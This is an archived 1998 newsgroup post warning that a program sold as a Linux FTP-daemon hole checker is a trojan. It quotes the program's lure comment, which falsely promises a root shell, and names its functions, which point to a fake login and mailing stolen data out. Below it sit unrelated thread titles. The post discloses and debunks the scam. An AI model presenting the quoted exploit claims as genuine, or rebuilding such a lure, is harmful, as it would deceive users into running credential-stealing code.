Security: Fake "ftp-hole"-checker ...

Security: Fake "ftp-hole"-checker ...

Post by Garry Glendow » Mon, 04 May 1998 04:00:00



On the 'net a program appeared, which states it is a checker for an
FTP-hole in Linux' FTP-Daemon. Closer (oh well...) examination of the
program, which starts like this:

/* FTP hole bug [05/01/98]
 * Affected Operating Systems: ALL LINUX
 * Exploitation Result: USers get root suid big on login rhost
 *
 * Syntax:
 * user~$ cc -o ftphole ftphole.c
 * user~$ ./ftphole
 *
 * it will then test and core dump an rhost file on your home dir with a
suid bit
 * then it'll bring you to a login screen and you login as normal and
then
 * using the rhost file with a suid bit you have a root shell
 *
 * www:~$ id
 * root
 *
 * pheer!!
 */

will let even an inexperienced C-programmer recognise the scam ... the

via mail ... anyway, the program doesn't hide its true functions at all,
even the function names speak for themselves:

[..]
  pimpthem();
  fakelogin();
  emailus();
[..]

No serious attack for serious system admins, but nonetheless ...

-gg

 
 
 

1. Fake root for ftp-user other than "ftp/anonymous"?

Hi!

When 'anonymous' or 'ftp' logs in, ftpd does a chroot for that
user, denying him access to other than a specified directory
tree.

Can I somehow get ftpd to do this for an other user?

(I want to automate data transfer between an 3090 running MVS and
a Unisys/Sequent running SVR3, ptx 1.3.1)

Thanks in advance,

  -Terje
_________________________________________________________________
Terje Thoegersen, Systems Consultant, Norsk Hydro a.s, Hydro Data
N-0240 Oslo, Norway. Tel : +47 22 43 23 46  Fax : +47 22 43 27 47

2. Driver for ATI-Ultra Pro??

3. GETSERVBYNAME()????????????????????"""""""""""""

4. Yamaha 6388 VPDC not compatable for Linux What? .Help Please

5. (SUMMARY) Fake root for ftp-user other than "ftp/anonymous"?

6. ONC/RPC for NT?

7. """"""""My SoundBlast 16 pnp isn't up yet""""""""""""

8. problems with PHP3+Apache1.3.6+MySQL

9. (Solaris 9) Anyone have success using "Aset" (security checker)?

10. rss" and "stack" and "data" in /etc/security/limits file

11. "ps" security hole?

12. Hard link a "security" hole?

13. Why is "." in the path a security hole ?